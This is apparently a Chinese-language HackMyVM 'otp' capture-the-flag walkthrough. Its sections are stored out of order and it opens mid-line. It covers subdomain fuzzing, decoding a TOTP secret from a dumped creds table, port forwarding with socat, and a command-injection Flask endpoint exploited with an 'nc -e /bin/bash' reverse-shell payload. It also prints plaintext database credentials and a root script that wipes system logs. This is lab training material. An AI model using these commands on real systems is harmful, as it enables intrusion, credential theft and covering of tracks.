Nov 22 2021 creds.sql\n-r-------- 1 www-data www-data 36 Nov 23 2021 note4david.txt\n(remote) www-data@otp:\/opt$ cat note4david.txt \nYour work has done you can rest now\n(remote) www-data@otp:\/opt$ cat creds.sql \n-- MariaDB dump 10.19 Distrib 10.5.12-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost Database: otp\n-- ------------------------------------------------------\n-- Server version 10.5.12-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE='+00:00' *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `creds`\n--\n\nDROP TABLE IF EXISTS `creds`;\n\/*!40101 SET @saved_cs_client = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `creds` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `username` varchar(255) NOT NULL,\n `password` varchar(255) NOT NULL,\n `totp` varchar(255) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `creds`\n--\n\nLOCK TABLES `creds` WRITE;\n\/*!40000 ALTER TABLE `creds` DISABLE KEYS *\/;\nINSERT INTO `creds` VALUES (1,'','','NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK');\n\/*!40000 ALTER TABLE `creds` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n-- Dump completed on 2021-11-20 10:46:17<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u52a0\u5bc6\u4ee5\u540e\u7684\u5bc6\u94a5\uff0c\u5c1d\u8bd5\u4f7f\u7528cyberchef<\/code>\u8fdb\u884c\u89e3\u5bc6<\/p>\n<\/div><\/p>\nNYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK\nn3v3rG0nn4G!v3y0UuP<\/code><\/pre>\n\u548c\u524d\u9762\u7684\u5bc6\u7801\u8054\u60f3\u7ec4\u5408\u4e00\u4e0b\uff1a<\/p>\n
n3v3rG0nn4G!v3y0UuP\navijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\navijneyam:n3v3rG0nn4G!v3y0UuP___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)<\/code><\/pre>\n\u521a\u597d\u6ee1\u8db3\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u7aef\u53e3\u8f6c\u53d1<\/h3>\navijneyam@otp:~$ sudo -l\n[sudo] password for avijneyam: \nMatching Defaults entries for avijneyam on otp:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser avijneyam may run the following commands on otp:\n (root) PASSWD: \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ ls -la\ntotal 20\ndrwx------ 2 avijneyam avijneyam 4096 Nov 22 2021 .\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 22 2021 .bash_history -> \/dev\/null\n-rwx------ 1 avijneyam avijneyam 3526 Nov 17 2021 .bashrc\n-rw------- 1 avijneyam avijneyam 33 Nov 22 2021 flag_user.txt\n-rwx------ 1 avijneyam avijneyam 807 Nov 17 2021 .profile\navijneyam@otp:~$ cat flag_user.txt \n2990aa5108d5803f3fdca99c277ba352\navijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n WARNING: This is a development server. Do not use it in a production deployment.\n Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)<\/code><\/pre>\n\u5f00\u542f\u4e86\u4e00\u4e2a\u7aef\u53e3\u670d\u52a1\uff0c\u4f46\u662f\u7531\u4e8e\u8fd9\u662f\u53d1\u751f\u5728\u672c\u5730\uff0c\u6240\u4ee5kali\u8bbf\u95ee\u4e0d\u5230\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff0c\u5229\u7528\u524d\u51e0\u5929\u5728pwn.college<\/code>\u5b66\u5230\u7684\uff0cctrl+z<\/code>\u5207\u6362\u5230\u540e\u53f0\uff0c\u8fdb\u884c\u8f6c\u53d1\uff0c\u518d\u6062\u590d\u8fdb\u7a0b\uff1a<\/p>\navijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n WARNING: This is a development server. Do not use it in a production deployment.\n Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)\n^Z\n[1]+ Stopped sudo -u root \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ socat tcp-listen:1234,fork tcp:127.0.0.1:5000 &\n[2] 2553724\navijneyam@otp:~$ fg\nsudo -u root \/bin\/bash \/root\/localhost.sh<\/code><\/pre>\n\u4e0a\u4f20\u6d4b\u8bd5<\/h3>\n
\u73b0\u5728\u770b\u4e00\u4e0b\u80fd\u5426\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u6d4b\u8bd5\u4e00\u4e0b\u5e38\u89c4\u7684\u4e0a\u4f20\u65b9\u6cd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X POST http:\/\/$IP:1234\/ \n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>405 Method Not Allowed<\/title>\n<h1>Method Not Allowed<\/h1>\n<p>The method is not allowed for the requested URL.<\/p>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X PUT http:\/\/$IP:1234\/\n{"message":"Provide command in JSON request!","success":false}<\/code><\/pre>\n\u53d1\u73b0\u91c7\u7528put<\/code>\u4e0a\u4f20json<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:1234 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/SourceCode (Status: 200) [Size: 1216]<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl http:\/\/$IP:1234\/SourceCode \nZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -s http:\/\/$IP:1234\/SourceCode | base64 -d \nfrom subprocess import Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route("\/", methods=[""])\ndef index():\n req_json = request.get_json()\n if req_json is None or "" not in req_json:\n abort(400, description="Please provide command in JSON request!")\n proc = Popen(req_json[""], stdout=PIPE, stderr=PIPE, shell=True)\n try:\n outs, errs = proc.communicate(timeout=1)\n except TimeoutExpired:\n proc.kill()\n abort(500, description="The timeout is expired!")\n if errs:\n abort(500, description=errs.decode('utf-8'))\n return jsonify(success=True, message=outs.decode('utf-8'))\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n return jsonify(success=False, message=error.description) , 500 <\/code><\/pre>\nFUZZ<\/h3>\n
\u8bf4\u660e\u53ef\u4ee5\u63d0\u4ea4json<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u8bbe\u7acb\u76d1\u542c\u7136\u540efuzz\u4e00\u4e0b\uff0c\u7528\u524d\u9762\u7684\u76ee\u5f55\u4f5c\u4e3a\u5b57\u5178\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n\u989d\uff0c\u5230\u8fd9\u91cc\u6211\u865a\u62df\u673a\u5c45\u7136\u6b7b\u673a\u4e86\u3002\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ echo "Adroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\nSysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen" > ff\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP:1234 -X PUT -H 'Content-Type: application\/json' -d '{"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}' -w .\/ff\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : PUT\n :: URL : http:\/\/:1234\n :: Wordlist : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header : Content-Type: application\/json\n :: Data : {"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n:: Progress: [130\/130] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 130 ::<\/code><\/pre>\n\u548b\u6ca1\u6210\u529f\uff0c\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u54ea\u51fa\u9519\u4e86\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540eIP\u6ca1\u6709\u8bbe\u7f6e\u3002\u3002\u3002\u3002\u8fd9\u4e2a\u662f\u4e34\u65f6\u7684\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.107:1234 -X PUT -H 'Content-Type: application\/json' -d '{"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}' -w .\/ff\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : PUT\n :: URL : http:\/\/192.168.0.107:1234\n :: Wordlist : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header : Content-Type: application\/json\n :: Data : {"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\nVisions [Status: 500, Size: 54, Words: 4, Lines: 2, Duration: 1161ms]\n:: Progress: [130\/130] :: Job [1\/1] :: 83 req\/sec :: Duration: [0:00:01] :: Errors: 0 ::<\/code><\/pre>\n\u53d1\u73b0shell\u5df2\u7ecf\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n
<\/div><\/p>\n(remote) root@otp:\/root# ls -la\ntotal 40\ndrwx------ 3 root root 4096 Jul 12 05:01 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\n-r-------- 1 root root 2307 Nov 22 2021 app.py\nlrwxrwxrwx 1 root root 9 Nov 22 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3526 Nov 17 2021 .bashrc\n-rwx------ 1 david david 61 Nov 23 2021 .chmod\n-rwx------ 1 root root 33 Nov 22 2021 flag_r00t.txt\n---x------ 1 root root 56 Nov 22 2021 localhost.sh\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\ndrwxr-xr-x 2 root root 4096 Jul 12 05:01 __pycache__\n-rwxr-xr-x 1 root root 354 Nov 23 2021 update.sh\n(remote) root@otp:\/root# cat flag_r00t.txt \n8a2d55707a9084982649dadc04b426a0\n(remote) root@otp:\/root# cat update.sh \n#!\/bin\/bash\n\nwhile :\ndo\n \/usr\/bin\/mysql -u hacker -p'#4ck!ng!s!nMybl0od' -D otp -e "UPDATE creds SET totp = $(oathtool --totp -b NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK) WHERE id=2"\n\n \/usr\/bin\/echo " " >\/var\/log\/auth.log\n \/usr\/bin\/echo " " >\/var\/log\/vsftpd.log\n \/usr\/bin\/echo " " >\/var\/log\/apache2\/access.log\n \/usr\/bin\/echo " " >\/var\/log\/apache2\/error.log\ndone\n(remote) root@otp:\/root# cat localhost.sh \n#!\/bin\/bash\n\ncd \/root\/ && \/usr\/bin\/python3 -m flask run\n(remote) root@otp:\/root# cat .chmod \n#!\/bin\/bash\n\n\/usr\/bin\/chmod 777 \/var\/www\/otp\/argon\/u9l04d_\/*\n(remote) root@otp:\/root# cat app.py \n# https:\/\/stackoverflow.com\/questions\/57104398\/python-flask-how-to-run-subprocess-pass-a-command\/57104633#57104633\nfrom subprocess import Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route("\/", methods=["PUT"])\ndef index():\n req_json = request.get_json()\n if req_json is None or "Visions" not in req_json:\n abort(400, description="Provide command in JSON request!")\n proc = Popen(req_json["Visions"], stdout=PIPE, stderr=PIPE, shell=True)\n try:\n outs, errs = proc.communicate(timeout=1)\n except TimeoutExpired:\n proc.kill()\n abort(500, description="The timeout is expired!")\n if errs:\n abort(500, description=errs.decode('utf-8'))\n return jsonify(success=True, message=outs.decode('utf-8'))\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n return jsonify(success=False, message=error.description) , 500\n\n@app.route("\/SourceCode")\ndef code():\n return "ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw"<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1nx4y1U7He\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.107:21\nOpen 192.168.0.107:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n80\/tcp open http syn-ack Apache httpd 2.4.51\n|_http-title: Did not follow redirect to http:\/\/otp.hmv\/\n|_http-server-header: Apache\/2.4.51 (Debian)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\nService Info: Host: 127.0.1.1; OS: Unix<\/code><\/pre>\n\u505a\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.0.107 otp.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/otp.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/.php (Status: 403) [Size: 272]\n\/index.html (Status: 200) [Size: 11202]\n\/.html (Status: 403) [Size: 272]\n\/javascript (Status: 301) [Size: 307] [--> http:\/\/otp.hmv\/javascript\/]\n\/.php (Status: 403) [Size: 272]\n\/.html (Status: 403) [Size: 272]\n\/server-status (Status: 403) [Size: 272]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u5c31\u662f\u4e00\u4e2a\u9ed8\u8ba4\u754c\u9762\uff0c\u6e90\u7801\u4e5f\u6ca1\u5565\u4e1c\u897f\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u76ee\u5f55\uff1a<\/p>\n
fuzz\u76ee\u5f55<\/h3>\n
\u6ca1\u53d1\u73b0\u5565\u654f\u611f\u76ee\u5f55\uff0c\u5c1d\u8bd5\u8fdb\u884cfuzz\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: FUZZ.otp.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 3482\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.otp.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 3482\n________________________________________________\n\nargon [Status: 200, Size: 25537, Words: 9965, Lines: 627, Duration: 89ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 365 req\/sec :: Duration: [0:00:58] :: Errors: 0 ::<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: otp.FUZZ.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20 \n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 20\n________________________________________________\n\notp [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 4ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5714 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: otp.otp.FUZZ.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: otp.otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 20\n________________________________________________\n\notp [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5882 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::<\/code><\/pre>\n\u4e0b\u9762\u8fd9\u4e2a\u4f3c\u4e4e\u4e0d\u592a\u9760\u8c31\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u4e0a\u9762\u90a3\u4e2a\uff1a<\/p>\n
